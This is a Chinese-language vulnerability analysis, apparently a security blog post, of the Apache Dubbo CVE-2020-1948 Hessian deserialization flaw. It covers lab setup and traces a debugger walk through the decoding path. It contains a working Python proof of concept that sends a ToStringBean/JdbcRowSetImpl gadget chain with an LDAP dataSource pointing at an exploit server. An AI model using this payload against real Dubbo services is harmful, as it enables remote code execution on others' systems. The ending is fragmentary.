- 远程通讯: 提供对多种基于长连接的NIO框架抽象封装,包括多种线程模型,序列化,以及“请求-响应”模式的信息交换方式。
- 集群容错: 提供基于接口方法的透明远程过程调用,包括多协议支持,以及软负载均衡,失败容错,地址路由,动态配置等集群支持。
- 自动发现: 基于注册中心目录服务,使服务消费方能动态的查找服务提供方,使地址透明,使服务提供方可以平滑增加或减少机器。
data:image/s3,"s3://crabby-images/75cae/75cae2342285794dfe65c3933dfa5fa011468f18" alt="Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞分析-RadeBit瑞安全"
Provider
暴露服务方称之为“服务提供者”
Consumer
调用远程服务方称之为“服务消费者”
Registry
服务注册与发现的中心目录服务称之为“服务注册中心”
Monitor
统计服务的调用次调和调用时间的日志服务称之为“服务监控中心”
Container
服务运行容器。
Provider将本地提供的远程方法在注册中心进行注册,Consumer需要调用时会先去注册中心进行查询,根据注册中心返回的结果再去对应的Provider中调用对应的远程方法,如果有变更,注册中心将基于长连接推送变更数据给Consumer 。
启动注册中心,Apache dubbo 推荐使用的注册中心时Apache ZooKeeper注册中心 下载地址https://zookeeper.apache.org/releases.html
data:image/s3,"s3://crabby-images/a4129/a41299e5f80664d1efc0dd7d15cae6092c0c1163" alt="Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞分析-RadeBit瑞安全"
Apache Dubbo有一个web端的管理界面 github地址如下https://github.com/apache/dubbo-admin
data:image/s3,"s3://crabby-images/dc245/dc245c0d843d8e2a7e3e9876c00741351f34ef94" alt="Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞分析-RadeBit瑞安全"
dubbo-admin-server 目录下运行 mvn package -Dmaven.test.skip=true 将该模块打包成jar包
data:image/s3,"s3://crabby-images/73698/736984d5b781fdc17d8db876c4d3e5a90891c14a" alt="Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞分析-RadeBit瑞安全"
然后 java -jar dubbo-admin-server-0.2.0-SNAPSHOT.jar 启动dubbo-admin-server,此时启动了 dubbo管理的服务端但是没有UI界面。
进入到 dubbo-admin-ui 中 执行 npm install 该命令执行完成后 执行npm run dev 。
data:image/s3,"s3://crabby-images/0a4da/0a4daffd30a2bc54c74388f341f80894679b38a4" alt="Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞分析-RadeBit瑞安全"
http://localhost:8081
data:image/s3,"s3://crabby-images/7db84/7db84c0d3063c517f6dbe663b5c4887a9417e4b7" alt="Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞分析-RadeBit瑞安全"
启动我们使用dubbo框架写的程序
data:image/s3,"s3://crabby-images/be91c/be91cf7601683f2356438f234e1767699555e865" alt="Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞分析-RadeBit瑞安全"
可以看到我们的远程方法服务成功在zookeeper注册中心进行注册
data:image/s3,"s3://crabby-images/25b73/25b73623e0dfbe2f75bfb13d1d9cffb233386d20" alt="Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞分析-RadeBit瑞安全"
from hessian2 import new_object
from client import DubboClient
client = DubboClient('127.0.0.1', 20880)
JdbcRowSetImpl=new_object(
'com.sun.rowset.JdbcRowSetImpl',
dataSource="ldap://127.0.0.1:8087/ExploitMac",
strMatchColumns=["fxx"]
)
JdbcRowSetImplClass=new_object(
'java.lang.Class',
name="com.sun.rowset.JdbcRowSetImpl",
)
toStringBean=new_object(
'com.rometools.rome.feed.impl.ToStringBean',
beanClass=JdbcRowSetImplClass,
obj=JdbcRowSetImpl
)
resp = client.send_request_and_return_response(
service_name='com.example.provider.service.UesrService',
method_name='test',
args=[toStringBean])
<dependency>
<groupId>com.rometools</groupId>
<artifactId>rome</artifactId>
<version>1.7.0</version>
</dependency>
data:image/s3,"s3://crabby-images/b6879/b6879a23358e44a5a615e1fe5b607c4210ccfe53" alt="Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞分析-RadeBit瑞安全"
data:image/s3,"s3://crabby-images/02401/0240171a0bbd46991c32a9db979e5335edf31c6e" alt="Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞分析-RadeBit瑞安全"
data:image/s3,"s3://crabby-images/26b6e/26b6ed7d3dc42c7dd994d0988d5efd6218764264" alt="Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞分析-RadeBit瑞安全"
data:image/s3,"s3://crabby-images/de0fb/de0fb42f6dd07e5fd7d9aa96a22dbe88283ca447" alt="Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞分析-RadeBit瑞安全"
可以看到正是我们通过POC发送的序列化数据
跟进该方法,在第131行代码处有一个if判断,这里通过RefctUtils.desc2classArray()处理完desc参数然后返回一个ToStringBean的类对象。
data:image/s3,"s3://crabby-images/4d388/4d388f167f8c2e2f05ed85ac203f484d5761e91f" alt="Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞分析-RadeBit瑞安全"
紧接着通过Hessian将ToStringBean的类对象反序列化成ToStringBean对象并赋值给args参数
data:image/s3,"s3://crabby-images/39fdb/39fdbcefdbbd7b7a7418fb33e94b7a9a5ec20a77" alt="Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞分析-RadeBit瑞安全"
仔细观察一下此时args指向的ToStringBean对象的详细内容,可见此时ToStringBean对象有两个属性已经被赋值为JdbcRowSetImpl。
data:image/s3,"s3://crabby-images/19f60/19f60652c2ec5b0e9fb6656114e3f99290c27c0c" alt="Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞分析-RadeBit瑞安全"
当前方法执行完成后 args参数和pts参数分别被赋值给当前对象的arguments属性和parameterTypes属性,然后当前DecodeableRpcInvocation作为参数进行返回
返回到DecodeHandler中,在第51行代码中传入的message参数是一个Request对象,该Request对象是dubbo的包中的,简单看一下该对象的详细信息
data:image/s3,"s3://crabby-images/21333/213332fd16977c846941356fc6644aafe260c2b9" alt="Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞分析-RadeBit瑞安全"
data:image/s3,"s3://crabby-images/300c3/300c3e3e3ba4c231a14c6268b7e0e23234684374" alt="Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞分析-RadeBit瑞安全"
跟进该方法,然后继续跟进handleRequest()方法。
data:image/s3,"s3://crabby-images/7deef/7deef0919cb4d8b35b079b6dfde425df6b591125" alt="Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞分析-RadeBit瑞安全"
在DubboProtocol类的第263行代码中经过一个if判断然后判断成功会抛出一个RemotingException,关键点就在这里,可以看到传入的参数中采用了字符串拼接的形式,当使用字符串拼接的时候,会自动调用StringBuilder的对象的append方法,依次处理channel.getRemoteAddress()的返回值,channel.getLocalAddress()的返回值,getInvocationWithoutData(inv)的返回值,而getInvocationWithoutData(inv)的返回值正式含有恶意请求的DecodeableRpcInvocation对象,StringBuilder要调用DecodeableRpcInvocation的toString方法将其转化为字符串
data:image/s3,"s3://crabby-images/68db4/68db4bdd7c99086e2070fb1aa749652dd329a4e9" alt="Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞分析-RadeBit瑞安全"
data:image/s3,"s3://crabby-images/2e8b0/2e8b0f6c45da940351a2a713df405660080581a7" alt="Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞分析-RadeBit瑞安全"
data:image/s3,"s3://crabby-images/f3125/f31253791fefc7733f11dbde9ccdc02db4d34e58" alt="Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞分析-RadeBit瑞安全"
DecodeableRpcInvocation类的父类RpcInvocation重写了toString方法,看一下RpcInvocation.toString()方法的实现
data:image/s3,"s3://crabby-images/89d70/89d70db014a24f0b9baf20fb662ac7651407afab" alt="Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞分析-RadeBit瑞安全"
同样还是字符串拼接,其中Arrays.toString(arguments),agruments正是之前封装进DecodeableRpcInvocation对象中的ToStringBean对象。接下来自然会调用ToStringBean.toString()方法。
ToStringBean.toString()方法,执行时取出其中的obj属性获取其类名称,并作为参数传入另一个重写的toString方法
data:image/s3,"s3://crabby-images/8ba2b/8ba2ba756a08c18cd48df9269dec6a1d890bed1e" alt="Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞分析-RadeBit瑞安全"
该toString方法中会通过反射不断调用JdbcRowSetImpl对象的各个方法,当反射调用JdbcRowSetImpl对象的getDatabaseMetaData方法时,会触发JDNI远程访问dataSource
data:image/s3,"s3://crabby-images/a300c/a300cb438bd55c7451d5434b682b8ff51bd4321d" alt="Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞分析-RadeBit瑞安全"
data:image/s3,"s3://crabby-images/33a65/33a6582d71a3dd6cf7c1d4e1dc2dacbac0fb40f6" alt="Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞分析-RadeBit瑞安全"
我们可以看到dataSource的值
data:image/s3,"s3://crabby-images/c70dc/c70dc0d06e188931d8b00a5e57960f63f10c1bf8" alt="Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞分析-RadeBit瑞安全"
data:image/s3,"s3://crabby-images/12cb8/12cb8e4609d76af0abb880af582e328d804e14eb" alt="Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞分析-RadeBit瑞安全"
至此Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞原理分析完毕
data:image/s3,"s3://crabby-images/4af7e/4af7ec0fa559772c092a24d866113e71dd68dec9" alt="Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞分析-RadeBit瑞安全"
data:image/s3,"s3://crabby-images/bd30a/bd30a53c4fb0aca74eb2fcb9c1c8df42abbcb459" alt="Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞分析-RadeBit瑞安全"
data:image/s3,"s3://crabby-images/c4718/c47183b70260973c02a1d07745081fc8a35abb12" alt="Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞分析-RadeBit瑞安全"
不难发现该方法内用仅仅只用String.equals方法对比了method参数是否和$INVOKE常量或者$INVOKE_ASYNC常量的值相同。
我门看一下两个常量的值
data:image/s3,"s3://crabby-images/d868e/d868e41ba11c38df9139e77f3bdb786aab2ee711" alt="Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞分析-RadeBit瑞安全"
我们此时 method的值为“test”可见并不相同,紧接着进入RpcUtils.isEcho()方法,同样是和常量进行对比,显然结果也不相同
data:image/s3,"s3://crabby-images/7e332/7e3329ba949b483e007303a0e2794a68ea7a49b3" alt="Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞分析-RadeBit瑞安全"
data:image/s3,"s3://crabby-images/ecdce/ecdce67fb9972695aa66d679d70fd569ee1c2b0d" alt="Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞分析-RadeBit瑞安全"
invoke”,“$invokeAsync”,“$
$data:image/s3,"s3://crabby-images/65727/657275fba49751d6f08158e620918f08783e73f0" alt="Apache dubbo (CVE-2020-1948) 反序列化远程代码执行漏洞分析-RadeBit瑞安全"
最新评论